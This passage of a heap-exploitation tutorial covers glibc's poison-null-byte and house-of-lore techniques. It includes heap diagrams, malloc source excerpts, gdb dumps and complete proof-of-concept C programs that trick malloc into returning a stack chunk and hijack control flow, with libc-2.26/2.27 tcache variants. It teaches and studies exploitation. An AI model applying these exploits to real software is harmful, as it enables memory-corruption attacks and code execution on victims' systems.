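- Extending an allocated chunk: when the chunk after the overflowing chunk is in use, the overflowed byte must be chosen carefully so that the consolidation performed when it is freed goes through, for example by adding the size of the following chunk so that it is covered completely. The next allocation of the matching size then returns the enlarged chunk and leads to a further overflow.
  0x100   0x100    0x80
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   overflow: set B's size to 0x180
|-------|-------|-------|
|   A   |   B   |   C   |   free B
|-------|-------|-------|
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   chunk C is overwritten
        |<- allocated ->|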
- Shrinking a freed chunk: this covers the case where the overflowed byte can only be 0, which is the poison-null-byte of this section. The size of the following freed chunk is reduced, so that when this chunk is later split, the prev_size field of the chunk after it is not updated correctly, and overlapping chunks appear when it is freed.
  0x100       0x210       0x80
|-------|---------------|-------|
|   A   |       B       |   C   |   initial state
|-------|---------------|-------|
|   A   |       B       |   C   |   free B
|-------|---------------|-------|
|   A   |       B       |   C   |   overflow: set B's size to 0x200
|-------|---------------|-------|   later malloc calls do not update C's prev_size
         0x100  0x80
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8), malloc(0x80-8)
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   free B1
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   free C; C is merged with B1
|-------|------|-----|--|-------|
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8)
|-------|------|-----|--|-------|   B2 is overwritten
        |<-allocated>|
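- house of einherjar: also a case where the overflowed byte can only be 0. Here the overflow is used to set the prev_size field of the chunk after the overflowing chunk, so that when that chunk is freed it finds an earlier, legitimately freed chunk and merges with it, producing overlapping chunks.
  0x100   0x100   0x101
|-------|-------|-------|
|   A   |   B   |   C   |   initial state
|-------|-------|-------|
|   A   |   B   |   C   |   free A
|-------|-------|-------|
|   A   |   B   |   C   |   overflow B: the null byte turns C's size from 0x101 into 0x100, and C's prev_size is set to 0x200
|-------|-------|-------|
|   A   |   B   |   C   |   free C
|-------|-------|-------|
|   A   |   B   |   C   |   C is merged with A
|-------|-------|-------|   chunk B is overlapped
|<----- allocated ----->|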
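The arithmetic behind a null-byte overflow is simple enough to state in code. The sketch below assumes a little-endian 64-bit target, where the lowest byte of the next chunk's size field is the first byte past the usable area of the overflowing chunk. The toy_ helper names are hypothetical.

```c
#include <stdint.h>

#define TOY_SIZE_BITS 0x7ULL

/* Size field after its lowest byte has been overwritten with 0x00. */
uint64_t toy_null_byte_overflow(uint64_t size_field)
{
    return size_field & ~(uint64_t)0xff;
}

/* Number of bytes by which the chunk appears to shrink after the overflow. */
uint64_t toy_shrink_amount(uint64_t size_field)
{
    uint64_t before = size_field & ~TOY_SIZE_BITS;
    uint64_t after = toy_null_byte_overflow(size_field) & ~TOY_SIZE_BITS;
    return before - after;
}
```

A size field of 0x111 becomes 0x100, so the chunk appears 0x10 bytes shorter and its PREV_INUSE bit is cleared as a side effect; a size field of 0x101 becomes 0x100, which only clears the flag.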
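First, three chunks are allocated. The type of the first does not matter, but the last two must not be fast chunks, because fast chunks are not consolidated when freed. Chunk a is used to produce the single-byte overflow that overwrites the lowest byte of chunk b's size field, and chunk c helps forge the fake chunk.
The overflow comes first, so we need to know how much memory in a chunk is actually usable (because the prev_size field of the next chunk is reused, it can be slightly larger than what was requested). The function malloc_usable_size, which returns that size, is implemented as follows: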
/*
------------------------- malloc_usable_size -------------------------
*/
static size_t
musable (void *mem)
{
mchunkptr p;
if (mem != 0)
{
p = mem2chunk (mem);
[...]
if (chunk_is_mmapped (p))
return chunksize (p) - 2 * SIZE_SZ;
else if (inuse (p))
return chunksize (p) - SIZE_SZ;
}
return 0;
}
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p) \
((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p) ((p)->size & ~(SIZE_BITS))
So real_a_size = chunksize(a) - 0x8 == 0x18. Also note that whether a chunk is in use is determined from the PREV_INUSE flag of the next chunk.
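The value 0x18 can be reproduced from the request size alone. The sketch below assumes a 64-bit glibc layout (SIZE_SZ = 8, 16-byte alignment, MINSIZE = 0x20) and covers only in-use chunks that are not mmapped, that is, the second branch of musable above. The toy_ function names are hypothetical.

```c
#include <stddef.h>

/* Assumed 64-bit glibc constants (illustrative). */
#define TOY_SIZE_SZ    8UL
#define TOY_ALIGN_MASK 15UL
#define TOY_MINSIZE    0x20UL

/* Chunk size that malloc would use for a given request. */
size_t toy_chunk_size_for(size_t req)
{
    size_t sz = req + TOY_SIZE_SZ + TOY_ALIGN_MASK;
    if (sz < TOY_MINSIZE)
        return TOY_MINSIZE;
    return sz & ~TOY_ALIGN_MASK;
}

/* Usable size of an in-use, non-mmapped chunk: the chunk size minus one
   size field, because the next chunk's prev_size field is reused as data. */
size_t toy_usable_size(size_t req)
{
    return toy_chunk_size_for(req) - TOY_SIZE_SZ;
}
```

For malloc(0x10) this gives 0x18, so a[real_a_size] in the example program is exactly the lowest byte of chunk b's size field.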
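To still pass the unlink check after chunk b's size field has been modified, we need to forge a c.prev_size field. Its value is easy to compute: 0x100 == (0x111 & 0xff00), which is exactly the size after the NULL byte overflow. Then chunk b is freed and placed in the unsorted bin with size 0x110. The heap layout at this point is: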
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000111 <-- chunk b [be freed]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size
0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x110, flags=PREV_INUSE)
The crucial step: overwrite chunk b's metadata through the overflow:
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000100 <-- chunk b [be freed]
0x603030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603040: 0x0000000000000000 0x0000000000000000
0x603050: 0x0000000000000000 0x0000000000000000
0x603060: 0x0000000000000000 0x0000000000000000
0x603070: 0x0000000000000000 0x0000000000000000
0x603080: 0x0000000000000000 0x0000000000000000
0x603090: 0x0000000000000000 0x0000000000000000
0x6030a0: 0x0000000000000000 0x0000000000000000
0x6030b0: 0x0000000000000000 0x0000000000000000
0x6030c0: 0x0000000000000000 0x0000000000000000
0x6030d0: 0x0000000000000000 0x0000000000000000
0x6030e0: 0x0000000000000000 0x0000000000000000
0x6030f0: 0x0000000000000000 0x0000000000000000
0x603100: 0x0000000000000000 0x0000000000000000
0x603110: 0x0000000000000000 0x0000000000000000
0x603120: 0x0000000000000100 0x0000000000000000 <-- fake c.prev_size
0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603020, bk=0x603020
→ Chunk(addr=0x603030, size=0x100, flags=)
Now, using the calculation described in the previous section:
chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x100
prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x100) == 0x100
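the check passes. The size of the chunk in the unsorted bin has also become 0x100.
Next we allocate two chunks of arbitrary size; malloc carves memory of the appropriate size out of the unsorted bin chunk and returns it to the user: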
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000091 <-- chunk b1 <-- fake chunk b
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000051 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000 <-- fake c.prev_size
0x603130: 0x0000000000000110 0x0000000000000090 <-- chunk c
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
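Something interesting happens here: after the allocations, it is fake c.prev_size that changes, not c.prev_size. Chunk c therefore still believes that a free chunk of size 0x110 sits where chunk b used to be, even though that memory has already been handed out to chunk b1.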
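Now for the moment of truth. We know that two adjacent small chunks are merged once both have been freed. First free chunk b1, which makes fake chunk b look like a free chunk. Then free chunk c: the allocator sees that the chunk before chunk c is free, merges the two, takes the result out of the unsorted bin, and merges it into the top chunk. Poor chunk b2, sitting between chunk b1 and chunk c, is simply ignored. malloc now considers the whole region unallocated, as the new top chunk pointer makes clear.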
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000020fe1 <-- top chunk
0x603030: 0x0000000000603100 0x00007ffff7dd1b78
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x4141414141414141 0x4141414141414141
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000090 0x0000000000000050 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4141414141414141 0x4141414141414141
0x6030d0: 0x4141414141414141 0x4141414141414141
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- unsorted bin
0x603110: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
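Consolidation works as follows: the chunk is first merged with the previous chunk, then the allocator checks whether the next chunk is the top chunk. If it is not, the merged chunk is placed in the unsorted bin; otherwise it is merged into the top chunk: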
/* consolidate backward */
if (!prev_inuse(p)) {
prevsize = p->prev_size;
size += prevsize;
p = chunk_at_offset(p, -((long) prevsize));
unlink(av, p, bck, fwd);
}
if (nextchunk != av->top) {
/*
Place the chunk in unsorted chunk list. Chunks are
not placed into regular bins until after they have
been given one chance to be used in malloc.
*/
[...]
}
/*
If the chunk borders the current high end of memory,
consolidate into top
*/
else {
size += nextsize;
set_head(p, size | PREV_INUSE);
av->top = p;
check_chunk(av, p);
}
Next, request a large allocation, large enough to cover chunk b2, so that chunk b2 is completely under our control.
gef➤ x/42gx a-0x10
0x603000: 0x0000000000000000 0x0000000000000021 <-- chunk a
0x603010: 0x0000000000000000 0x0000000000000000
0x603020: 0x0000000000000000 0x0000000000000121 <-- chunk d
0x603030: 0x4242424242424242 0x4242424242424242
0x603040: 0x4242424242424242 0x4242424242424242
0x603050: 0x4242424242424242 0x4242424242424242
0x603060: 0x4242424242424242 0x4242424242424242
0x603070: 0x4242424242424242 0x4242424242424242
0x603080: 0x4242424242424242 0x4242424242424242
0x603090: 0x4242424242424242 0x4242424242424242
0x6030a0: 0x4242424242424242 0x4242424242424242
0x6030b0: 0x4242424242424242 0x4242424242424242 <-- chunk b2 <-- 'victim' chunk
0x6030c0: 0x4242424242424242 0x4242424242424242
0x6030d0: 0x4242424242424242 0x4242424242424242
0x6030e0: 0x4141414141414141 0x4141414141414141
0x6030f0: 0x4141414141414141 0x4141414141414141
0x603100: 0x0000000000000000 0x0000000000000021 <-- small bins
0x603110: 0x00007ffff7dd1b88 0x00007ffff7dd1b88 <-- fd, bk pointer
0x603120: 0x0000000000000020 0x0000000000000000
0x603130: 0x0000000000000110 0x0000000000000090
0x603140: 0x0000000000000000 0x0000000000020ec1 <-- top chunk
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[1]: fw=0x603100, bk=0x603100
→ Chunk(addr=0x603110, size=0x20, flags=PREV_INUSE)
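One more thing is worth noting: when chunk d was allocated, no suitable chunk was found in the unsorted bin, so malloc sorted the chunks in the unsorted bin into their respective bins, which here means the small bins.
Finally, on libc-2.26 the situation is the same as long as the tcache is dealt with: fill the tcache bins for both chunk sizes.
AddressSanitizer reports a heap-buffer-overflow. For some reason, with the memory-checking option enabled the 'real' size is only the plain 0x10 (presumably because ASan substitutes its own allocator for glibc's).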
$ gcc -fsanitize=address -g poison_null_byte.c
$ ./a.out
We allocate 0x10 bytes for 'a': 0x60200000eff0
'real' size of 'a': 0x10
b: 0x611000009f00
c: 0x60c00000bf80
=================================================================
==2369==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x611000009ef8 at pc 0x000000400be0 bp 0x7ffe7826e9a0 sp 0x7ffe7826e990
READ of size 8 at 0x611000009ef8 thread T0
#0 0x400bdf in main /home/firmy/how2heap/poison_null_byte.c:22
#1 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400978 in _start (/home/firmy/how2heap/a.out+0x400978)
0x611000009ef8 is located 8 bytes to the left of 256-byte region [0x611000009f00,0x61100000a000)
allocated by thread T0 here:
#0 0x7f47d9425602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x400af1 in main /home/firmy/how2heap/poison_null_byte.c:15
#2 0x7f47d8fe382f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
house_of_lore
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
void jackpot(){ puts("Nice jump d00d"); exit(0); }
int main() {
intptr_t *victim = malloc(0x80);
memset(victim, 'A', 0x80);
void *p5 = malloc(0x10);
memset(p5, 'A', 0x10);
intptr_t *victim_chunk = victim - 2;
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[3] = {0};
stack_buffer_1[0] = 0;
stack_buffer_1[2] = victim_chunk;
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
free((void*)victim);
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
void *p2 = malloc(0x100);
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
victim[1] = (intptr_t)stack_buffer_1;
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
void *p3 = malloc(0x40);
char *p4 = malloc(0x80);
memset(p4, 'A', 0x10);
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
intptr_t sc = (intptr_t)jackpot;
memcpy((p4+40), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x1b2e010
stack_buffer_1: 0x7ffe5c570350
stack_buffer_2: 0x7ffe5c570330
Freeing the victim chunk 0x1b2e010, it will be inserted in the unsorted bin
victim->fd: 0x7f239d4c9b78
victim->bk: 0x7f239d4c9b78
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x1b2e0c0
The victim chunk 0x1b2e010 will be inserted in front of the SmallBin
victim->fd: 0x7f239d4c9bf8
victim->bk: 0x7f239d4c9bf8
Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffe5c570360
The fd pointer of stack_buffer_2 has changed: 0x7f239d4c9bf8
Nice jump d00d
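The previous techniques showed how to forge a fake chunk. Next we try to forge a small bin chain.
First create two chunks. The first is our victim chunk, which must be a small chunk; the second can be anything and only exists to keep the victim chunk from being merged into the top chunk when it is freed. Then forge two fake chunks on the stack: fake chunk 1 has its fd pointing to the victim chunk and its bk pointing to fake chunk 2, and fake chunk 2 has its fd pointing to fake chunk 1. With that, the small bin chain is almost complete: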
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk
0x603010: 0x4141414141414141 0x4141414141414141
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000000 0x0000000000000021 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
The check that malloc performs on the small bin list looks like this:
[...]
else
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
{
errstr = "malloc(): smallbin double linked list corrupted";
goto errout;
}
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
[...]
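In other words, malloc follows victim->bk to the next chunk in the bin and checks that this chunk's fd pointer points back to victim, which is how corruption of the small bins is detected. Passing this check on two consecutive allocations is the reason we have to forge the first two chunks of the bin at the same time.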
Next, free the victim chunk. It is placed in the unsorted bin, with both fd and bk pointing at the head of the unsorted bin:
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed]
0x603010: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000020f51 <-- top chunk
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
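Now request a large chunk; it only needs to be large enough that malloc cannot find a suitable chunk in the unsorted bin. The chunks that were in the unsorted bin are then sorted into the bins they belong to, which here means the small bins: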
gef➤ heap bins small
[ Small Bins for arena 'main_arena' ]
[+] small_bins[8]: fw=0x603000, bk=0x603000
→ Chunk(addr=0x603010, size=0x90, flags=PREV_INUSE)
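Next comes the most critical step. Assume there is a vulnerability that lets us modify the bk pointer of the victim chunk. We change bk so that it points to the fake small bin we laid out on the stack: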
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000091 <-- victim chunk [be freed]
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50 <-- bk->fake chunk 1
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x4141414141414141
0x603060: 0x4141414141414141 0x4141414141414141
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000090 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x0000000000603000 0x00007fffffffdc30 <-- fd->victim chunk, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
Small bins are first-in, first-out: nodes are added at the head of the list and removed from the tail. The whole chain now looks like this:
HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> victim chunk <-> TAIL
fd: ->
bk: <-
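The bk of fake chunk 2 points to an undefined address. If the address of HEAD could be obtained, for example through a memory leak, and written there, the chain would be closed. There is no need to do that here, though.
The first malloc that follows returns the address of the victim chunk. Things would be a little simpler if the requested size matched the victim chunk exactly, but we do not do that here and request a smaller size instead. As the dump shows, malloc takes the victim chunk from the tail of the small bin, cuts off a piece to return as chunk p3, and puts the remainder into the unsorted bin. The small bin now looks like this: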
HEAD(undefined) <-> fake chunk 2 <-> fake chunk 1 <-> TAIL
gef➤ x/26gx victim-2
0x603000: 0x0000000000000000 0x0000000000000051 <-- chunk p3
0x603010: 0x00007ffff7dd1bf8 0x00007fffffffdc50
0x603020: 0x4141414141414141 0x4141414141414141
0x603030: 0x4141414141414141 0x4141414141414141
0x603040: 0x4141414141414141 0x4141414141414141
0x603050: 0x4141414141414141 0x0000000000000041 <-- unsorted bin
0x603060: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 <-- fd, bk pointer
0x603070: 0x4141414141414141 0x4141414141414141
0x603080: 0x4141414141414141 0x4141414141414141
0x603090: 0x0000000000000040 0x0000000000000020 <-- chunk p5
0x6030a0: 0x4141414141414141 0x4141414141414141
0x6030b0: 0x0000000000000000 0x0000000000000111 <-- chunk p2
0x6030c0: 0x0000000000000000 0x0000000000000000
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007fffffffdc50 0x0000000000400aed <-- fd->fake chunk 1
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- fake chunk 1
0x7fffffffdc60: 0x00007ffff7dd1bf8 0x00007fffffffdc30 <-- fd->TAIL, bk->fake chunk 2
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x603050, bk=0x603050
→ Chunk(addr=0x603060, size=0x40, flags=PREV_INUSE)
Finally, another malloc returns the address of fake chunk 1, which lies on the stack and is under our control. The small bin now looks like this:
HEAD(undefined) <-> fake chunk 2 <-> TAIL
gef➤ x/10gx &stack_buffer_2
0x7fffffffdc30: 0x0000000000000000 0x0000000000000000 <-- fake chunk 2
0x7fffffffdc40: 0x00007ffff7dd1bf8 0x0000000000400aed <-- fd->TAIL
0x7fffffffdc50: 0x0000000000000000 0x0000000000000000 <-- chunk 4
0x7fffffffdc60: 0x4141414141414141 0x4141414141414141
0x7fffffffdc70: 0x00007fffffffdd60 0x7c008088c400bc00
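We have thus tricked malloc into allocating a chunk on the stack.
One last thought: the initial victim chunk could also be a fast chunk. After being freed it goes into the fast bins rather than the unsorted bin, but after the malloc it too ends up sorted into the small bins. Try it yourself.
AddressSanitizer reports a heap-use-after-free, so the vulnerability used above to modify the bk pointer would presumably be a UAF, although an overflow would work as well: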
$ gcc -fsanitize=address -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x60c00000bf80
stack_buffer_1: 0x7ffd1fbc5cd0
stack_buffer_2: 0x7ffd1fbc5c90
Freeing the victim chunk 0x60c00000bf80, it will be inserted in the unsorted bin
=================================================================
==6034==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00000bf80 at pc 0x000000400eec bp 0x7ffd1fbc5bf0 sp 0x7ffd1fbc5be0
READ of size 8 at 0x60c00000bf80 thread T0
#0 0x400eeb in main /home/firmy/how2heap/house_of_lore.c:27
#1 0x7febee33c82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#2 0x400b38 in _start (/home/firmy/how2heap/a.out+0x400b38)
Finally, here is a version for libc-2.27:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
void jackpot(){ puts("Nice jump d00d"); exit(0); }
int main() {
intptr_t *victim = malloc(0x80);
// fill the tcache
int *a[10];
int i;
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
for (i = 0; i < 7; i++) {
free(a[i]);
}
memset(victim, 'A', 0x80);
void *p5 = malloc(0x10);
memset(p5, 'A', 0x10);
intptr_t *victim_chunk = victim - 2;
fprintf(stderr, "Allocated the victim (small) chunk: %p\n", victim);
intptr_t* stack_buffer_1[4] = {0};
intptr_t* stack_buffer_2[6] = {0};
stack_buffer_1[0] = 0;
stack_buffer_1[2] = victim_chunk;
stack_buffer_1[3] = (intptr_t*)stack_buffer_2;
stack_buffer_2[2] = (intptr_t*)stack_buffer_1;
stack_buffer_2[3] = (intptr_t*)stack_buffer_1; // 3675 bck->fd = bin;
fprintf(stderr, "stack_buffer_1: %p\n", (void*)stack_buffer_1);
fprintf(stderr, "stack_buffer_2: %p\n\n", (void*)stack_buffer_2);
free((void*)victim);
fprintf(stderr, "Freeing the victim chunk %p, it will be inserted in the unsorted bin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
void *p2 = malloc(0x100);
fprintf(stderr, "Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: %p\n", p2);
fprintf(stderr, "The victim chunk %p will be inserted in front of the SmallBin\n", victim);
fprintf(stderr, "victim->fd: %p\n", (void *)victim[0]);
fprintf(stderr, "victim->bk: %p\n\n", (void *)victim[1]);
victim[1] = (intptr_t)stack_buffer_1;
fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n");
void *p3 = malloc(0x40);
// empty the tcache
for (i = 0; i < 7; i++) {
a[i] = malloc(0x80);
}
char *p4 = malloc(0x80);
memset(p4, 'A', 0x10);
fprintf(stderr, "This last malloc should return a chunk at the position injected in bin->bk: %p\n", p4);
fprintf(stderr, "The fd pointer of stack_buffer_2 has changed: %p\n\n", stack_buffer_2[2]);
intptr_t sc = (intptr_t)jackpot;
memcpy((p4+0xa8), &sc, 8);
}
$ gcc -g house_of_lore.c
$ ./a.out
Allocated the victim (small) chunk: 0x55674d75f260
stack_buffer_1: 0x7ffff71fb1d0
stack_buffer_2: 0x7ffff71fb1f0
Freeing the victim chunk 0x55674d75f260, it will be inserted in the unsorted bin
victim->fd: 0x7f1eba392b00
victim->bk: 0x7f1eba392b00
Malloc a chunk that can't be handled by the unsorted bin, nor the SmallBin: 0x55674d75f700
The victim chunk 0x55674d75f260 will be inserted in front of the SmallBin
victim->fd: 0x7f1eba392b80
victim->bk: 0x7f1eba392b80
Now emulating a vulnerability that can overwrite the victim->bk pointer
This last malloc should return a chunk at the position injected in bin->bk: 0x7ffff71fb1e0
The fd pointer of stack_buffer_2 has changed: 0x7ffff71fb1e0
Nice jump d00d
